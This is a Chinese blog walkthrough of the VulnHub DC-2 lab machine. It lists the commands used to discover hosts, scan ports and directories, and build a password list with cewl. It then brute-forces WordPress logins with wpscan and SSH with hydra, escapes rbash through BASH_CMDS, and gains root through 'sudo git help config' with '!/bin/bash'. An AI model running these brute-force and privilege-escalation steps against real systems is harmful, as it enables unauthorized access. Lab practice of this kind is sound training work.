DC-2

最新推荐文章于 2024-11-09 14:59:10 发布
最新推荐文章于 2024-11-09 14:59:10 发布
阅读量351 收藏 9
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xxxtentaction24/article/details/139330523
版权

1.探测目标DC-1的ip因为已经设置为了NAT模式所以可以通过arp-scan网段进行发现目标IP我这边用的是arp-scan

arp-scan -l

通过对照物理地址我们可以知道对应的ip

2.使用nmap -sV -p- 192.168.106.130进行扫描查看端口

我们需要去etc/hosts之中添加一句话:IP dc-2

3.使用whatweb进行扫描框架

whatweb -v 192.168.106.130

发现存在wordpress框架

4.利用dirsearch进行接口扫描

dirsearch -u 192.168.106.130 -e *

5.使用cewl生成一个密码字典

cewl http://dc-2/ -w pwd.dic

6.使用wpscan进行利用

发现三个账户

7.创建一个字典并且把三个账户放入字典文件中

继续使用wpscan进行爆破:

利用代码:wpscan --url http://dc-2/ -U user.dic -P pwd.dic 

得到账号密码

8.登入进去后得到flag2

9.利用软件进行爆破爆破出密码

hydra -L user.dic -P pwd.dic -vV ssh://192.168.106.130:7744

10.rbash绕过             

tom@DC-2:~$ BASH_CMDS[x]=/bin/bash

tom@DC-2:~$ x

tom@DC-2:~$ whoami

x: whoami: command not found

tom@DC-2:~$ export PATH=$PATH:/bin/

tom@DC-2:~$ 

tom@DC-2:~$ export PATH=$PATH:/usr/bin/

tom@DC-2:~$ whoami

tom

tom@DC-2:~$

11.

让我们转到jerry账户上面去

使用代码:su 用户名进行转换

寻找flag

find / -name *flag*

查看flag4.txt

需要git提权

12.git提权

sudo git help config

并在里面的最后一行加入

!/bin/bash

提权成功

13.查找文件

Cd /

find / -name *flag*

xxxtentaction24
关注
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
参考资料-BODE100-DC-DC-Stability-V2--电源环路分析--案例.zip
01-16
《电源环路分析——以BODE100 DC-DC稳定性案例为例》 在电子工程领域,电源系统的设计与分析是至关重要的环节。本资料主要围绕"电源环路分析"这一主题,结合BODE100设备进行DC-DC转换器的稳定性分析,通过具体的...
DC-2靶机详解
苏生要努力
03-03 1465
写写自己打DC-2的过程使用工具DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
DC-2靶机攻略
weixin_43179779的博客
10-16 1923
DC-2靶机攻略
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 2010
vulnhub的dc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
DC-2靶场实战详解
热门推荐
a310034188的博客
11-30 1万+
DC-2 写写自己打DC-2的过程 使用工具 kali DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/ 环境配置。 我这里的话kali和DC-2都是nat模式 kali IP为:192.168.28.139 DC-2 IP设置为nat模式,具体多少暂时也不知道。 信息收集 查找 DC-2 IP arp-scan -l 得到DC-2 IP为:192.168.28.179 扫描开启的端口 nmap -A -p1-65535 198.13.51.
DC-2靶场渗透测试实验整理
u013930899的博客
09-15 1974
dc-2实验
靶机3 DC-2(过程超详细)
honest_gg的博客
09-26 1741
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 3017
DC-2靶机渗透测试思路及流程
DC-2靶机的渗透学习
里丘~班诺的小屋
09-01 1838
目录 0X00 靶机的环境搭配 0X01战前准备 一、IP扫描 二、端口扫描 三、网站目录扫描 四、查看网站结构 三、渗透开始 一、flag1 二、flag2 2.1 使用cewl生成密码 2.2 使用wpscan扫出用户 2.3 找到3个用户admin、jerry、tom,并将他们放入一个文本文件中 2.4 开始爆破 2.5登录后台网页 三、flag3 3.1 ssh登录 3.2 初步查找文件 四、flag4 4.1 绕过rbash 五、flag5 5.1..
渗透测试学习之靶机DC-2
xdbzdgx的博客
11-08 3134
1.下载靶机 本篇文章是DC靶机系列的第二个篇,针对DC-2,建议感兴趣的读者从DC-1开始练习((26条消息) 渗透测试学习之靶机DC-1_xdbzdgx的博客-CSDN博客)。 DC-2的下载地址为DC: 2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我
DC-2通关详解
2401_84741371的博客
09-27 1936
发现访问不了,输入的IP地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt。1、与DC-1很相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。wpscan --url http://dc-2 --enumerate u 枚举用户。登录后台之后,我们看到flag2,我用的是jerry的账号。
DC-002 DC-005 DC-012 电源接口2D3D三维视图PCB封装库AD库(8个合集).zip
05-31
DC-002 DC-005 DC-012 电源接口2D3D三维视图PCB封装库AD库(8个合集) Component Count : 8 Component Name ----------------------------------------------- DC-002 DC-003 DC-003A DC-005 DC-005P DC-012 DC-...
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
11-05 1161
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
防火墙|WAF|漏洞|网络安全
qq_43777616的博客
11-06 805
防火墙|WAF|漏洞|网络安全
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
11-06 1656
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全从零开始学习CTF——CTF基本概念
最新发布
Hacker_Oldv的博客
11-09 588
不要太深入,差不多就可以了,对照文档就可以写出程序就差不多了且能看得懂就好了,因为每个语言都是学不完的,一直在更新,如果过分专注于一个语言,安全知识就挺容易漏下的。上面都是个人想法,怎么选都要靠自己决定,要不要深入、深入哪一门都是问题,一定要考虑清楚再下手,别等下学了一半就改变方向,这是学习的大忌,因为你学其它的也会这样,除非是你发现这个不是很适合你的发展。其中,一血、二血、三血拿的分数比较高,后面答该题的队伍拿的分数就一样了,答题的队伍越少,分数就越多,然后按分数排名,确定进入决赛的队伍。
硬件设备网络安全问题与潜在漏洞分析及渗透测试应用
weixin_62512865的博客
11-08 931
硬件加密绕过漏洞:研究发现,多款流行的SSD存在加密机制绕过漏洞,攻击者可以无需密码 即可绕过硬盘加密措施,获取硬盘中的数据内容。这包括Crucial和Samsung等品牌的SSD产 品,它们尝试实现TCG Opal加密标准,但存在缺陷,允许在不知道任何密钥的情况下完全恢 复数据。固件更新机制漏洞:英睿达MX500系列SSD被曝出存在缓冲区溢出漏洞,攻击者可以精心构 造ATA数据包,通过主机直接发送给SSD控制器,从而触发缓冲区溢出,可能导致数据泄露。
标题:网络安全:数字时代的守护盾
运维人生
11-08 425
网络安全是指保护网络系统中的硬件、软件及数据免受恶意攻击、破坏、泄露或非法使用的状态和能力。系统安全:确保服务器、路由器、交换机等网络基础设施的安全运行,防止被非法入侵或篡改。数据安全:保护存储在网络中的数据不被未经授权的访问、泄露、修改或删除。应用安全:确保网络应用程序(如网站、移动APP)没有安全漏洞,能够抵御恶意软件的攻击。身份与访问管理:通过认证、授权和审计机制,确保只有合法用户才能访问特定资源。网络安全意识:提高用户对网络威胁的认识,教育他们如何识别和防范钓鱼邮件、恶意链接等常见攻击手段。
DC-DC电路电感选择深度解析
"DC-DC电路中电感的选择关乎到开关电源设计的效率与稳定性。电感不仅是LC滤波电路的组成部分,其行为在开关电源的降压转换中扮演着关键角色。电感的选择需要考虑电感值、电流承受能力、绕线电阻以及机械尺寸等因素。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值